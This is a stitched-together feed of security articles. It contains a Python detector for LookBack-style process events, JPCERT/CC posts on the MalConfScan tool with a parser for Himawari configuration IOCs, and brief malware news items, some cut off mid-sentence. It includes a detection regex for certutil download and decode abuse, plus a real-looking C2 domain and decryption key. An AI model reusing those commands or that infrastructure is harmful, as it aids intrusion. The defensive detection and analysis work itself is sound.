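    "|ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
    "Image=C:\\Windows\\System32\\certutil.exe"
    "|CommandLine=certutil -verify C:\\certs\\corp-root.cer"
    "|ParentImage=C:\\Windows\\System32\\cmd.exe",
    "Image=C:\\Users\\u\\AppData\\Local\\Temp\\GUP.exe"
    "|CommandLine=GUP.exe"
    "|ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
    "Image=C:\\Program Files\\Notepad++\\updater\\GUP.exe"
    "|CommandLine=GUP.exe -v7.7"
    "|ParentImage=C:\\Program Files\\Notepad++\\notepad++.exe",
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# certutil switches that decode or fetch content (living-off-the-land use);
# -decode turns a base64 PEM body back into a binary.
CERTUTIL_ABUSE = re.compile(r"(?:^|\s)[-/](?:decode|decodehex|urlcache|encode)\b", re.IGNORECASE)


def parse_event(line: str) -> dict:
    """Split 'key=value|key=value' into a dict; values may contain '=' but not '|'."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Return the names of the rules that match one event (empty = nothing suspicious)."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    hits = []
    if image == "certutil.exe" and CERTUTIL_ABUSE.search(cmd):
        hits.append("certutil_decode_or_download")
    if parent in OFFICE_APPS and image not in OFFICE_APPS:
        hits.append("office_spawned_process")
    if image == "gup.exe" and "\\notepad++\\" not in event.get("Image", "").lower():
        hits.append("gup_outside_notepadpp")
    return hits


def detect(lines) -> list:
    """Return (index, rule_names) for every event that trips at least one rule."""
    alerts = []
    for i, line in enumerate(lines):
        hits = classify(parse_event(line))
        if hits:
            alerts.append((i, hits))
    return alerts


if __name__ == "__main__":
    for i, hits in detect(SAMPLE_EVENTS):
        print(i, hits)
```

The two benign events (an administrator verifying a certificate from cmd.exe, and the genuine Notepad++ updater started by notepad++.exe) stay quiet, which is the point of keying the GUP.exe rule on its location rather than its name alone.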
Related Links
Proofpoint Blog: LookBack Malware Targets the United States Utilities Sector with Phishing Attacks
SecurityWeek Article: New LookBack Malware Used in Attacks Against U.S. Utilities Sector
Threatpost Article: Nation-State APTs Target U.S. Utilities With Dangerous Malware
Blog: IEC 62351 Standards for Securing Power System Communications
Blog: Advancing IEC Standards for Power Grid Cyber Security
Webpage: Real-time Visibility and Cyber Security for Electric Utilities
Webpage: Mitigating ICS Cyber Incidents
Webpage: Nozomi Network Labs
Webpage: OT ThreatFeed
The post What You Need to Know About LookBack Malware & How to Detect It appeared first on Nozomi Networks.
In malware analysis, extracting the configuration is an important step. The configuration holds information that provides many clues for incident handling, for example the details of communication with other hosts and the persistence mechanisms used. This time we introduce the plugin "MalConfScan with Cuckoo", which automatically extracts malware configuration using MalConfScan (see the previous article) and Cuckoo Sandbox (hereafter "Cuckoo").
This plugin is available on GitHub. Feel free to download from the webpage below:
JPCERTCC/MalConfScan – GitHub
https://github.com/JPCERTCC/MalConfScan-with-Cuckoo
About MalConfScan with Cuckoo
"MalConfScan with Cuckoo" is a plugin for Cuckoo, an open source sandbox system for dynamic malware analysis. Adding the plugin to Cuckoo makes MalConfScan run as part of the analysis, enabling automatic extraction of malware configuration. Figure 1 shows how Cuckoo behaves with "MalConfScan with Cuckoo" installed.
Figure 1:Behaviour of “MalConfScan with Cuckoo”
"MalConfScan with Cuckoo" runs the malware in the Cuckoo analysis machine (the guest VM) to extract its configuration. When malware is submitted to Cuckoo and executed in the guest, a memory image is dumped, from which MalConfScan extracts the configuration of known malware. The extracted configuration is then shown in the report. See the previous article or the following page for the list of malware the tool supports.
JPCERTCC/MalConfScan – GitHub
https://github.com/JPCERTCC/MalConfScan/
Instruction and report example
First, submit the malware to a Cuckoo instance that has "MalConfScan with Cuckoo" installed, using the web GUI or the command line; Cuckoo's documentation [1] details the submission procedure. When the upload and analysis are complete, a report such as the one in Figure 2 is produced.
Figure 2:Report of “MalConfScan with Cuckoo”
Figure 2 shows the configuration of Himawari, a RedLeaves variant used in targeted attacks. It is a bot whose configuration contains the C&C server, destination port, protocol, encryption key and so on. In this way "MalConfScan with Cuckoo" can easily extract the configuration of known malware.
Additionally, the results can also be obtained in JSON format. report.json records the following data:
"malconfscan": {
  "data": [
    {
      "malconf": [
        [
          {"Server1": "diamond.ninth.biz"},
          {"Server2": "diamond.ninth.biz"},
          {"Server3": "diamond.ninth.biz"},
          {"Server4": "diamond.ninth.biz"},
          {"Port": "443"},
          {"Mode": "TCP and HTTP"},
          {"ID": "2017-11-28-MACRO"},
          {"Mutex": "Q34894iq"},
          {"Key": "usotsuki"},
          {"UserAgent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)"},
          {"Proxy server": ""},
          {"Proxy username": ""},
          {"Proxy password": ""}
        ]
      ],
      "vad_base_addr": "0x04521984",
      "process_name": "iexplore.exe",
      "process_id": "2248",
      "malware_name": "Himawari",
      "size": "0x00815104"
    }
  ]
}
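Turning that report section into indicators an incident handler can act on, as an added example that is not part of MalConfScan or the JPCERT/CC article: the `malconf` value is a list of lists of single-key dicts, so the parser flattens it, deduplicates the Server1..Server4 entries, converts the port and VAD base address to integers and drops empty proxy fields. The embedded report is a constructed, abridged copy of the Himawari section shown above (the user agent is shortened).

```python
import json

# Constructed, abridged copy of the "malconfscan" section of a Cuckoo report.json,
# using the Himawari values from the article. A real report has many more sections.
SAMPLE_REPORT = json.loads("""
{
  "malconfscan": {
    "data": [
      {
        "malconf": [[
          {"Server1": "diamond.ninth.biz"},
          {"Server2": "diamond.ninth.biz"},
          {"Server3": "diamond.ninth.biz"},
          {"Server4": "diamond.ninth.biz"},
          {"Port": "443"},
          {"Mode": "TCP and HTTP"},
          {"ID": "2017-11-28-MACRO"},
          {"Mutex": "Q34894iq"},
          {"Key": "usotsuki"},
          {"UserAgent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"},
          {"Proxy server": ""},
          {"Proxy username": ""},
          {"Proxy password": ""}
        ]],
        "vad_base_addr": "0x04521984",
        "process_name": "iexplore.exe",
        "process_id": "2248",
        "malware_name": "Himawari",
        "size": "0x00815104"
      }
    ]
  }
}
""")


def flatten_malconf(entry: dict) -> dict:
    """malconf is a list of lists of single-key dicts (one inner list per config
    block); merge them into one flat dict. Later keys win on duplicates."""
    flat = {}
    for group in entry.get("malconf", []):
        for kv in group:
            flat.update(kv)
    return flat


def extract_iocs(report: dict) -> list:
    """One record per detected injected process, with the fields an incident
    handler wants first: family, process, C2 hosts, port, mutex, key."""
    records = []
    for entry in report.get("malconfscan", {}).get("data", []):
        conf = flatten_malconf(entry)
        servers = sorted({v for k, v in conf.items() if k.startswith("Server") and v})
        port = conf.get("Port", "")
        records.append({
            "malware": entry.get("malware_name"),
            "process": f"{entry.get('process_name')}:{entry.get('process_id')}",
            "vad_base": int(entry["vad_base_addr"], 16) if entry.get("vad_base_addr") else None,
            "c2": servers,
            "port": int(port) if port.isdigit() else None,
            "mutex": conf.get("Mutex") or None,
            "key": conf.get("Key") or None,
            "proxy": conf.get("Proxy server") or None,
        })
    return records


def load_report(path: str) -> list:
    """Read a Cuckoo report.json from disk and return its IOC records."""
    with open(path, "r", encoding="utf-8") as fh:
        return extract_iocs(json.load(fh))


if __name__ == "__main__":
    for rec in extract_iocs(SAMPLE_REPORT):
        print(json.dumps(rec, indent=2))
```

Keep the mutex and key alongside the C2 hosts: the mutex is a cheap host-based indicator for sweeping other machines, and the key is what lets you decrypt captured traffic to the servers listed.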
How to install
The following steps are required before installing “MalConfScan with Cuckoo”:
Install MalConfScan
Apply patches for Cuckoo
Change configuration of Cuckoo
For more information about how to install the tool, please see our wiki on the GitHub:
MalConfScan-with-Cuckoo Wiki – GitHub
https://github.com/JPCERTCC/MalConfScan-with-Cuckoo/wiki
Verified environment:
Ubuntu 18.04
Python 2.7.16
Cuckoo 2.0.6
Volatility 2.6
A blog article by @soji256 explains procedures to install “MalConfScan with Cuckoo”, which can be a good reference.
Installing the MalConfScan with Cuckoo to Analyze Emotet – Medium
https://medium.com/@soji256/build-a-malconfscan-with-cuckoo-environment-to-analyze-emotet-ff0c4c589afe
In closing
This plugin extracts the configuration of known malware from the sandbox. Even where the malware has anti-VM or anti-sandbox functions, we can still extract the configuration by spoofing some environmental information.
We will present the details of "MalConfScan" and "MalConfScan with Cuckoo" at the upcoming Black Hat USA 2019 Arsenal [3]. Feel free to stop by if you are attending Black Hat USA 2019; we look forward to active discussion and feedback from analysts.
Tomoaki Tani(Translated by Yukako Uchida)
[1] Cuckoo Docs – Submit an Analysis: https://cuckoo.sh/docs/usage/submit.html
[2] "Abnormal Encryption of Himawari" – Japan Security Analyst Conference [Japanese]: https://www.jpcert.or.jp/present/2018/JSAC2018_01_nakatsuru.pdf
[3] MalConfScan with Cuckoo: Automatic Malware Configuration Data Extraction and Memory Forensic – Black Hat USA 2019: https://www.blackhat.com/us-19/arsenal/schedule/index.html#malconfscan-with-cuckoo-automatic-malware-configuration-data-extraction-and-memory-forensic-16914
Every day, new types of malware are discovered. Many of them, however, are variants of existing malware: they share most of their code and differ only slightly in configuration, such as the C&C servers. In such cases, extracting the configuration covers most of what the analysis needs to deliver.
In this article, we would like to introduce details of “MalConfScan”, a tool to extract malware configuration, developed by JPCERT/CC. This tool is available on GitHub. Feel free to download from the webpage below:
JPCERTCC/MalConfScan – GitHub https://github.com/JPCERTCC/MalConfScan
Read the Wiki to learn how to install the tool:
MalConfScan wiki – GitHub https://github.com/JPCERTCC/MalConfScan/wiki
About MalConfScan
MalConfScan is a plugin for The Volatility Framework (hereafter "Volatility"), a memory forensics tool. In most cases malware analysis begins with unpacking the malware in order to extract its configuration. MalConfScan instead extracts the configuration from the unpacked executable as loaded in memory.
MalConfScan can perform the following functions:
malconfscan: extract the configuration of known malware from a memory image
malstrscan: detect suspicious processes in a memory image and list the strings they reference
malconfscan
Figure 1 is an example of malconfscan output. First the name of the process into which the malware was injected (Name), its process ID (PID) and the name of the detected malware (Malware Name) are displayed, followed by the malware configuration (Config info).
Figure 1:malconfscan execution result (Detected “Lavender”, a RedLeaves variant)
malconfscan also decodes encoded strings and lists DGA domains. Figure 2 shows malconfscan detecting Bebloh; the DGA domains are listed after the configuration.
Figure 2:malconfscan execution result (Detected Bebloh)
As of 30 July 2019, malconfscan is compatible with 25 types of malware. See Appendix for supported malware.
malstrscan
malstrscan detects process hollowing in memory and lists the strings the hollowed process references. Malware configuration is usually encoded, but the malware decodes it when it needs the information, and the decoded data is sometimes left behind in memory. This function picks up such remnants. Figure 3 is an example of malstrscan output.
Figure 3:malstrscan execution results
malstrscan lists strings only from the memory region where the PE file is loaded. With the -a option it also lists strings in the heap and the parent memory space.
In closing
malconfscan can be used for malware analysis and memory forensics. We hope that this tool helps incident investigation. We plan to update this tool in the future to make it compatible with many other types of malware.
In the next article, we will install this tool in Cuckoo Sandbox to automatically extract malware configuration.
Shusei Tomonaga
(Translated by Yukako Uchida)
Appendix A Malware Compatible with MalConfScan
Table 1: Compatible malware
Malware
Ursnif
HawkEye Keylogger
Emotet
Lokibot
Smoke Loader
Bebloh
Poison Ivy
AZORult
CobaltStrike
NanoCore RAT
NetWire
AgentTesla
PlugX
FormBook
RedLeaves
NodeRAT
TSCookie
njRAT
TSC_Loader
TrickBot
xxmm
Remcos
Datper
QuasarRAT
Ramnit
The list of malware variants identified in June shows a return of WannaCry and Tinba activity.
The trend remains that the ten most frequently identified variants account for more than 60 percent of all malware identifications.
The distribution of the most frequently occurring malware names for June 2019 is as follows:
Security researchers from Palo Alto Networks' Unit 42 team have discovered the macOS malware CookieMiner, designed to steal the cookies associated with cryptocurrency exchange websites.
There are two types of companies: those who have been hacked, and those who don't yet know they have been hacked.[1]
With data breaches frequently making the news and causing panic among network administrators, the above statement by former Cisco boss John Chambers in 2015 certainly doesn’t seem far-fetched. I don’t remember a week in 2018 going by where I wasn’t learning of a data breach and how sophisticated the attack was. Well, except for the time I didn’t have internet access while visiting the Salt Cathedral of Zipaquirá, and I couldn’t understand why. Then, there was the time I had no access on a cruise, but I digress.
The consequences of a data breach are far reaching and include the tangible and intangible. It should come as no surprise that information security is the top concern for CISOs and CIOs of companies. Some of these companies are embracing cloud-native initiatives that have improved organizational agility, reduced products’ time-to-market, and leveled the playing field with respect to computational power. However, they lose visibility into the expanded environment, causing concerns over whether they can adequately secure their cloud environment the way they would their traditional network.
These well-founded concerns are understandable. The traditional network security solutions used to combat the current cyber-crime wave have only increased complexity and risk for businesses. Fraudsters have stepped up their phishing techniques to deploy sophisticated malware on network devices (human controlled and otherwise) as part of ransomware campaigns, to steal sensitive data, or for other criminal activities.
It's far more important to keep an eye on what's traveling out of the network. Today, malicious actors aren't interested in scaling the castle wall and capturing the flag. They want to exfiltrate the flag.[2]
We should always remind ourselves of the statement above by John Kindervag and add to our focus ways to prevent any data exfiltration to unauthorized destinations from our network. Companies have typically leveraged endpoint solutions, in addition to other network elements, to protect against malware used for that purpose. However, to combat today's cyber-criminals, companies need to embrace a defense-in-depth security strategy in which every network layer used to access data is secured, and this includes the DNS layer. DNS is an often overlooked layer for security, yet it is integral to network functionality. It is the protocol we use to locate resources on a network. We use it to access our favorite websites, whether news or social media. We use it to reach printers and storage devices, to access the security cameras in the data center, and even to send email. It is also used by unsuspecting victims to reach the phishing websites from which malware is downloaded, and by malware itself to locate command-and-control servers on the internet. Those servers can serve as the destination for data stolen (also over the DNS protocol) from digital assets inside companies, or as the source of the keys used to encrypt digital assets as part of ransomware activity.
And so, it’s wise and imperative to secure the DNS layer as part of a defense-in-depth security strategy. As a security control point, DNS layer security offers a proactive way to uniformly and immediately block malicious domains and communications for all of your users, whether they are on or off network. It can also deliver lower latency, fewer broken sites and apps, and improved network performance.
These are the drivers for the Akamai Enterprise Threat Protector (ETP) solution. ETP is a Secure Internet Gateway that delivers advanced threat protection in the cloud for all of your users, wherever they are, and serves as their safe on-ramp to the internet. ETP uses multiple layers of protection — DNS, URL, and inline payload analysis — to provide security with reduced complexity and without impacting performance. Companies simply direct their recursive DNS traffic to the Enterprise Threat Protector global servers, where every requested domain is checked against Akamai's real-time domain risk scoring threat intelligence. Safe domains are resolved as normal, malicious domains are blocked, and risky domains are sent to a smart selective proxy where the HTTP or HTTPS URLs are inspected to determine whether they are malicious. The HTTP and HTTPS payloads from risky domains are then scanned in real time using multiple advanced malware-detection engines.
ETP improves security defenses. It reduces security complexity and increases the efficiency of security teams. Find out more here.
In March 2018 the URLhaus project was launched by abuse.ch, a non-profit cyber-security organisation based in Switzerland.
The purpose of URLhaus is to collect URLs of sites that distribute malware, and after ten months of work the collaboration has now taken down no fewer than 100,000 sites.
256 security researchers spread across the world report malware sites to URLhaus every day, and in that way they help internet users against malware campaigns.
“A First Look at the Crypto-Mining Malware Ecosystem: A Decade of Unrestricted Wealth” https://t.co/ggSw5PG4Bh #cryptomining #malware
Security researchers at Malwarebytes have identified a new macOS malware, dubbed DarthMiner, which combines the functionality of the EmPyre backdoor and the XMRig cryptominer.
Using removable media like USB drives in the manufacturing automation sector is a fact of life where folks from operators
The malware is believed to have been created by US and Israeli intelligence agencies. Stuxnet is designed to alter the Programmable Logic Controllers (PLCs) used in industrial control systems (ICS). The Stuxnet malware has made a powerful comeback after a hiatus of almost eight years, with a new variant impacting Iranian networks.
According to security researcher Lukas Stefanko, who works for antivirus vendor ESET, more than 500,000 users have downloaded malware-infected apps from Google's own app store, Google Play.
The case concerns 13 different games, created by the same developer, which together have been downloaded more than half a million times.
According to the researcher, the application fetches malicious code from an external server and installs malware on the device, while at the same time deleting the app icon.